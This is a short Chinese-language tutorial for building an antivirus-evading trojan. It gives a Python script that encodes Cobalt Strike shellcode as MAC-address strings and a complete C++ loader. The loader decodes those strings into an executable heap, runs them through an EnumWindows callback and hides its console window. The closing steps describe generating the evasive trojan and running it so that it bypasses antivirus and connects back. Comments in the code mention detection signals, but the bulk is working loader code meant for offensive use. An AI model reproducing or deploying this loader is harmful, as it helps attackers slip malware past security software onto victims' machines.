1、首先生成CS的shellcode
2、将shellcode放入python脚本编码为MAC地址形式
def convertToMAC(shellcode):
    """Render a byte string as a list of MAC-address-style strings.

    Each group of six bytes becomes one ``"XX-XX-XX-XX-XX-XX"`` string of
    upper-case hex pairs. When the input length is not a multiple of six,
    the padded length is printed and NUL bytes are appended so the final
    group is complete. This is an encoding, not encryption: the original
    bytes are recovered trivially, so the strings remain an inspectable
    artefact of the input.

    Args:
        shellcode: the bytes to encode.

    Returns:
        list[str]: one MAC-formatted string per six-byte group (an empty
        list for empty input).
    """
    remainder = len(shellcode) % 6
    if remainder:
        padding = 6 - remainder
        print("\n[*] length:", len(shellcode) + padding)
        shellcode += b"\x00" * padding
    # Slice into six-byte groups and join each as two-digit upper-case hex.
    return [
        "-".join(f"{octet:02X}" for octet in shellcode[start:start + 6])
        for start in range(0, len(shellcode), 6)
    ]
if __name__ == '__main__':
    # Placeholder input; the encoded groups are printed as a list literal
    # rendered with double quotes instead of Python's single quotes.
    buf = b'''shellcode_here'''
    print(str(convertToMAC(buf)).replace("'", '"'))
3、使用C++的RtlEthernetStringToAddressA函数（该函数将以太网MAC地址的字符串表示形式转换为以太网地址的二进制格式）将MAC字符串还原为shellcode字节，最后通过回调执行shellcode。
#include<Windows.h>
#include <iostream>
#include<ip2string.h>
#pragma comment(lib,"Ntdll.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // Windows 控制台程序 不弹 黑窗口
// The converted shellcode (shellcode -> mac): MAC-address-style strings
// produced by the Python encoder above; each entry decodes back to six bytes.
const char* mac_[] =
{
    MAC_here
};
int main()
{
    // Reserve space in the process's virtual address space as a private heap
    // whose memory is executable. Creating a heap with
    // HEAP_CREATE_ENABLE_EXECUTE is uncommon in legitimate software and is a
    // useful hunting/detection signal for defenders.
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    // Allocate a fixed 0x100000-byte region from that heap.
    void* SB = HeapAlloc(hc, 0, 0x100000);
    DWORD_PTR hptr = (DWORD_PTR)SB;
    int elems = sizeof(mac_) / sizeof(mac_[0]);
    PCSTR Terminator = "";
    // Decode each MAC-format string into six raw bytes written directly into
    // the executable buffer. RtlEthernetStringToAddressA is used here only as
    // a hex-to-bytes converter; repurposing a benign parsing API this way is
    // the pattern defenders should recognise.
    for (int i = 0; i < elems; i++) {
        if (RtlEthernetStringToAddressA(mac_[i], &Terminator, (DL_EUI48*)hptr) == STATUS_INVALID_PARAMETER)
        {
            printf("ERROR!");
            return 0;
        }
        hptr += 6;
    }
    // Transfer control to the decoded bytes by passing the heap buffer as the
    // EnumWindows callback (indirect execution through a Windows API). From a
    // defensive view, a callback target inside heap-backed, non-image memory
    // is the observable anomaly.
    EnumWindows((WNDENUMPROC)SB, 0);
}
4、生成免杀后的木马
5、执行绕过杀软上线